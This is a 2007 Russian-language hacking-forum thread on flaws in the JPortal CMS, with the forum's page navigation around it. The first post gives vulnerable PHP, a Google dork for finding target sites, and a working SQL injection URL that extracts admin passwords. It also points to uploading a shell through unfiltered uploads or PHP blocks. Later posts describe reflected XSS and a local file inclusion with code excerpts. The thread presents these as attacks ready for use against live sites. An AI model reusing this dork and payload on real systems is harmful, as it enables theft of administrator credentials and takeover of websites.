ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

JPoprtal 2.3.1 и ниже SQL иньекция.
  #1  
Старый 09.11.2007, 15:43
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию JPoprtal 2.3.1 и ниже SQL иньекция.

Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

Уязвимый код:

PHP код:
function topic_name($a
{    
global 
$topic_tbl;
$query "SELECT * FROM $topic_tbl WHERE id=$a";
$result mysql_query($query);  
$r mysql_fetch_array($result);    
return 
'<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';  

Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

Код:
articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/
В более старых версиях jp_admins. Также есть таблица users или jp_users.

Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.
__________________
...

Последний раз редактировалось Alexsize; 09.11.2007 в 15:50..
 
Ответить с цитированием

  #2  
Старый 09.11.2007, 16:23
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

ещё одна https://forum.antichat.ru/thread53101.html
ЗЫ один минус: на многих стоят детекторы атаки sql-inj
 
Ответить с цитированием

  #3  
Старый 09.11.2007, 23:10
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

_http://milw0rm.com/exploits/4614
__________________
...
 
Ответить с цитированием

JPoprtal 2.3.1 Passive XSS and Local File Inclusion.
  #4  
Старый 14.11.2007, 01:47
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию JPoprtal 2.3.1 Passive XSS and Local File Inclusion.

Passive XSS in "theme/Default/index.php" :
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title><? echo $site_name ?> - <? echo $site_title ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<? echo $head_info ?>
<? echo $meta_info ?>
<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">
Если registers_global=On, то через переменные $site_name, $site_title, $head_info, $meta_info
и $theme можно передать XSS-вектор.
Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php.

Local File Inclusion in "module.php":
Код:
function module($op) {
global $error;

if(file_exists('module/'.$op.'.aim.php')) {
include('module/'.$op.'.aim.php'); /* (2) */
} elseif($op=='') {
header("Location: index.php");
exit;
} else {
$error = 'e1';
}
}
[...]
module($op); /* (1) */
Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath

Последний раз редактировалось [53x]Shadow; 14.11.2007 в 01:52..
 
Ответить с цитированием

  #5  
Старый 14.11.2007, 20:01
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

Цитата:
Сообщение от [53x]Shadow  
Passive XSS in "theme/Default/index.php" :
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title><? echo $site_name ?> - <? echo $site_title ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<? echo $head_info ?>
<? echo $meta_info ?>
<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">
Если registers_global=On, то через переменные $site_name, $site_title, $head_info, $meta_info
и $theme можно передать XSS-вектор.
Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php.

Local File Inclusion in "module.php":
Код:
function module($op) {
global $error;

if(file_exists('module/'.$op.'.aim.php')) {
include('module/'.$op.'.aim.php'); /* (2) */
} elseif($op=='') {
header("Location: index.php");
exit;
} else {
$error = 'e1';
}
}
[...]
module($op); /* (1) */
Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath
Насчет локал инклуда могу сказать точно - большинство сайтов от него закрыты. Я не стал его постить поэтому. Про ксс тоже знал, правда активную. Кое где ее неумело поприменяли=) Но рыть ее не стал.
__________________
...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ